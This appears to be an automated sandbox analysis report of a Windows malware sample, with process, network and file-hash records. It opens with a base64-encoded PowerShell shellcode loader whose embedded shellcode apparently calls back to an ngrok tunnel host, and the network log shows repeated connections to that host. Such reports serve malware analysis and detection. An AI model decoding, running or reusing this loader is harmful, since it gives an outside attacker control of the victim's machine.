AHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwA=

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s24hl05a\s24hl05a.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB7C.tmp" "c:\Users\Admin\AppData\Local\Temp\s24hl05a\CSC6A726B40C104461BB2177FA8445EAB.TMP"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 adfstat.yandex.ru udp
RU 87.250.250.145:443 adfstat.yandex.ru tcp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 87.250.250.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 145.250.250.87.in-addr.arpa udp
US 8.8.8.8:53 119.250.250.87.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 52.42.69.239:443 shavar.prod.mozaws.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 239.69.42.52.in-addr.arpa udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 push.services.mozilla.com udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
N/A 127.0.0.1:49956 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
N/A 127.0.0.1:49963 tcp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:80 mega.nz tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:80 mega.nz tcp
US 8.8.8.8:53 mega.nz udp
US 8.8.8.8:53 5.145.216.31.in-addr.arpa udp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 mega.io udp
LU 89.44.169.132:443 mega.io tcp
US 8.8.8.8:53 mega.io udp
US 8.8.8.8:53 mega.io udp
US 8.8.8.8:53 132.169.44.89.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
LU 66.203.125.11:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 lu.api.mega.co.nz udp
US 8.8.8.8:53 lu.api.mega.co.nz udp
US 8.8.8.8:53 11.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 eu.static.mega.co.nz udp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
US 8.8.8.8:53 eu.static.mega.co.nz udp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
FR 23.200.86.251:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigl6ney.gvt1.com udp
GB 173.194.183.166:443 r1---sn-aigl6ney.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 251.86.200.23.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 166.183.194.173.in-addr.arpa udp
GB 173.194.183.166:443 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:443 mega.io tcp
US 8.8.8.8:53 37.124.203.66.in-addr.arpa udp
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 reqstat.api.mega.co.nz udp
LU 66.203.125.28:443 reqstat.api.mega.co.nz tcp
US 8.8.8.8:53 reqstat.api.mega.co.nz udp
US 8.8.8.8:53 reqstat.api.mega.co.nz udp
US 8.8.8.8:53 5.144.216.31.in-addr.arpa udp
US 8.8.8.8:53 28.125.203.66.in-addr.arpa udp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
US 8.8.8.8:53 gfs440n202.userstorage.mega.co.nz udp
JP 103.99.35.202:443 gfs440n202.userstorage.mega.co.nz tcp
US 8.8.8.8:53 gfs440n202.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs440n202.userstorage.mega.co.nz udp
JP 103.99.35.202:443 gfs440n202.userstorage.mega.co.nz tcp
US 8.8.8.8:53 202.35.99.103.in-addr.arpa udp
US 8.8.8.8:53 mcd270n310.karere.mega.nz udp
US 8.8.8.8:53 mcd270n310.karere.mega.nz udp
US 8.8.8.8:53 mcd270n310.karere.mega.nz udp
LU 66.203.125.56:443 mcd270n310.karere.mega.nz tcp
US 8.8.8.8:53 56.125.203.66.in-addr.arpa udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 mega.nz udp
US 8.8.8.8:53 mega.nz udp
LU 66.203.124.37:443 mega.io tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
LU 66.203.125.11:443 lu.api.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
US 8.8.8.8:53 lu.api.mega.co.nz udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 prod.balrog.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 lu.api.mega.co.nz udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com tcp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:443 mega.io tcp
LU 66.203.124.37:443 mega.io tcp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 12.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 eu.static.mega.co.nz udp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 reqstat.api.mega.co.nz udp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
LU 66.203.125.28:443 reqstat.api.mega.co.nz tcp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 gfs440n202.userstorage.mega.co.nz udp
JP 103.99.35.202:443 gfs440n202.userstorage.mega.co.nz tcp
JP 103.99.35.202:443 gfs440n202.userstorage.mega.co.nz tcp
US 8.8.8.8:53 mcd270n314.karere.mega.nz udp
LU 66.203.125.29:443 mcd270n314.karere.mega.nz tcp
US 8.8.8.8:53 29.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 mcd270n310.karere.mega.nz udp
LU 66.203.125.56:443 mcd270n310.karere.mega.nz tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 108.177.122.94:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 94.122.177.108.in-addr.arpa udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 2.tcp.eu.ngrok.io udp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 86.93.192.18.in-addr.arpa udp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp
DE 18.192.93.86:18319 2.tcp.eu.ngrok.io tcp

Files

\??\pipe\crashpad_3420_SLDYAXLBAXRSTHJA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ab170131f1394b613b194b371ac52303
SHA1 6f00e8c6f60f81927db9276ffe0c730941084334
SHA256 82aefab3d16643b1f52d746b429de219ec0b97b8c0af1cb360106d9087b5577c
SHA512 cb88804da4a4de88466419f26594d561d6d35fcae4e6da5e2ad422f559b68264a3766c472b49e658811ce0743d7e4eacd457474720c401005d8854bcfaedd659

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 22b81405fe6be913f6b766754bd4d1cf
SHA1 cb6c2ad06bab7c46a9e3f8bb92ded8094f47e2d9
SHA256 bb8bd8fbd711070f4e17a751d6eea25a35aada863ae56e9d65abec48c32fa0da
SHA512 3eed3e7c7a9a8cd40985456602b797a5fe847440daf6af03ffe7361ded47d5926243fd8f71ff086fc09e73e2c0cf5264db539b15bb3ea99c980dff59106d4623

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 454e71e3f910dbfd25ce860cc334c8eb
SHA1 72c16d5233d5c3822ea1a16b3f25814ea516b2e3
SHA256 a9cb3fbaf2e42b5be51dc9e49eaea5630451907994207ebb652c0e7b3f2b50d6
SHA512 724f217e6170f6699db2e079ff4c88029cb6d18114dc16bd3080dff816bdeafb28f8ea30bcc7475dae58cd4267a86d669e30ef5ccfbe690403b837dab2e1c038

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f87030a6bb796e47954ce5f7c6f5ea86
SHA1 87e928d19a05e6a561e4824d3a50cb4203ee3a02
SHA256 a79adf6e6421dc8d69128264d470e589de10ecd74a1bfc33e4591f2bdbf853e7
SHA512 77df2117a31818aaab98c5916297b1736ba3e45c7350b80bbb0cd640113c849d4905918f3ef53ce8fe6caab126e7ff6956bc5267138846bedeb585ed3c2d5b1a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\8b1ee577-20f7-413b-9838-c8c36256be21

MD5 7a5ca81d6c47e22dbbf22349df54060d
SHA1 c4906b325c1e039132efb0b509dcd67f1483eb27
SHA256 b28965e63c52180b93be618c975805220f2ad51e967eec3c2ba5f3e74c6bc763
SHA512 85355b5bcaa80724cd2a907fe5fe350fb8ddfb3aa16fdae39743929b933997f87abe67929b0e3e157441e00433ae97ac2fb53aaa61730e4e589001c2e901f1fd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\844db0b7-7bae-4317-a997-2c2ebad11870

MD5 4afce323f1e58792e16e754ce28c7fc3
SHA1 61ef9076eb91f9da01df28cbd95c8e56bbdfddc5
SHA256 44c80b3627ca672738c0ab843125eb0c8a343590c4987c53a32ddaa3f438aa0a
SHA512 14d69d1b9a8d9af76ed6960187361a2754f71292e6072f965b73c652a9cef4522a79e924cff8bbb4f606005e48fad64ef1f0e3dfa7c369f45cc219a79b04362e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

MD5 3b0619b4604ce1bd3be604e803562e85
SHA1 b3eeb46abe2237e40c5d13afaf527fd408767cac
SHA256 4a99c3488e330da094522286e7d5724e0a8c632a58f2eb95cd482694ed2fe99a
SHA512 7ace76ab20507dee9a774d6f7701c7f62b2c3c08f2693640636a2231d2b94b9fdd55ab270f5b402be19d542be7430d23bc16ba865a670f98d6723537c880c1c8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

MD5 0683efcc668655c348f7f3eccc06ee2d
SHA1 d27b263f41f70e412ca52c8831c7fab5a1710237
SHA256 07c77a14c7590d57edd910ad982419a2c0beb4144e1ff4b4d761329b9e52183f
SHA512 cd43984eaa98fe49a6d0088eaaf4def4bf7458cfb6d89c728a00689aee5e2d3006b6bb26b007799c84dc1d783055bc58a7fe49061b37d81a42b2cc515854b51d

